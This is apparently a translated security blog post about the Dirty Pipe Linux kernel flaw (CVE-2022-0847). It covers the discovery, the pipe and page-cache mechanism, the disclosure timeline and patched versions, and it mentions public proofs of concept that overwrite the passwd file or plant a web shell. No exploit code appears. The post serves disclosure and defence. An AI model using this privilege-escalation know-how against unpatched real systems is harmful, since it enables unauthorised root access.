[German]A vulnerability CVE-2022-0847, known as Dirty Pipe, exists in almost all Linux distributions and allows unprivileged users to gain root privileges in Linux kernel 5.8 and above. Linux distributions, IoT devices (and possibly Android systems, if they already use kernel 5.8 and higher) are at risk. To make matters worse, an exploit is now publicly known.
Vulnerability CVE-2022-0847 allows root
German developer Max Kellermann disclosed the vulnerability CVE-2022-0847 in this post. The vulnerability, known as Dirty Pipe, is in the Linux kernel as of version 5.8 and allows data to be overwritten in arbitrary read-only files. This can be exploited for privilege escalation, as unprivileged processes can inject code into root processes. Mitre describes the vulnerability (for Debian) like this:
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. This flaw affects Linux kernel versions prior to 5.17-rc6.
The flaw is similar to CVE-2016-5195, known as Dirty Cow and fixed in 2016, but is easier to exploit, according to Kellermann. The vulnerability has been fixed in Linux 5.16.11, 5.15.25 and 5.10.102. Problem will be the systems in the field of IoT devices and Android, which no longer receive updates of the Linux kernel.
Discovery by chance
The discovery was made by chance with a support ticket about corrupted files. A customer complained that access logs downloaded in .gzip format could not be decompressed. Upon analysis, a corrupted log file was found on one of the log servers, and it could be decompressed. But gzip reported a CRC error. There was no explanation for the corruption.
When this CRC error occurred repeatedly months later with the log file and other files, Kellermann began investigating. In the process, he came across the vulnerability in the Linux kernel as of version 5.8. The vulnerability, CVE-2022-0847, occurs in the pipe function, which is used for unidirectional communication between processes.
Vulnerability in the Pipe Mechanism
The Linux kernel implements this by a ring of struct pipe_buffer, each pointing to a page. One end is used to push data in, the other end can retrieve this data. The first write to a pipe reserves a page (with max. space for 4 kB of data). If the last write does not fill the page completely, a subsequent write can be appended to the existing page instead of allocating a new page. This is how "anonymous" pipe buffers (anon_pipe_buf_ops) work.
However, when data is spliced() from a file into the pipe, the kernel first loads the data into the page cache. Then it creates a struct pipe_buffer structure that points into the page cache (zero copy). Unlike anonymous pipe buffers, additional data written to the pipe may not be appended to such a page because the page is owned by the page cache, not the pipe. This mechanism allows a non-privileged user via the dirty pipe vulnerability to inject and overwrite data in read-only files, including SUID processes running as root.
Fixes, disclosure and proof of concept
The support ticket mentioned above following a customer complaint about broken .gz archives dates to April 29, 2021 – but it wasn't until Feb. 19, 2022 that Kellermann was able to pinpoint the vulnerability in the Linux kernel. On February 20, 2022, the Linux kernel security team was informed. They began developing a cleaned-up kernel version.
- 2022-02-23: Linux stable releases with fix released (5.16.11, 5.15.25, 5.10.102)
- 2022-02-24: Google adds the fix to the Android kernel
On February 28, the Linux Distros mailing list was informed and on March 7, 2022, the vulnerability was disclosed in this blog post. More details and a proof of concept can also be found there.
The colleagues at Bleeping Computer point out here that a second proof of concept exists, in which a security researcher resets the passwd file of a Linux user. This way, he can provide an empty password, allowing attackers to get super user privileges via su root. And another security researcher has outlined a way to inject a Web shell via the vulnerability in a Linux system.
The Linux kernel 5.8 was released in August 2020. The problem what exists now: there are kernel patches for most Linux distributions, but not all Linux systems will be already patched. Specifically for IoT devices, it could affect some firmware implementations – although they may still be using the older kernels prior to version 5.8.
Regarding Android, I had a look: Wikipedia says that Android 11 only uses kernel versions 4.14, 4.19 as well as 5.4. Here I would cautiously give the all-clear – since only experimental versions of Android 12 use a kernel 5.10 (see here). Of course, this assumes that the older kernel versions are not affected.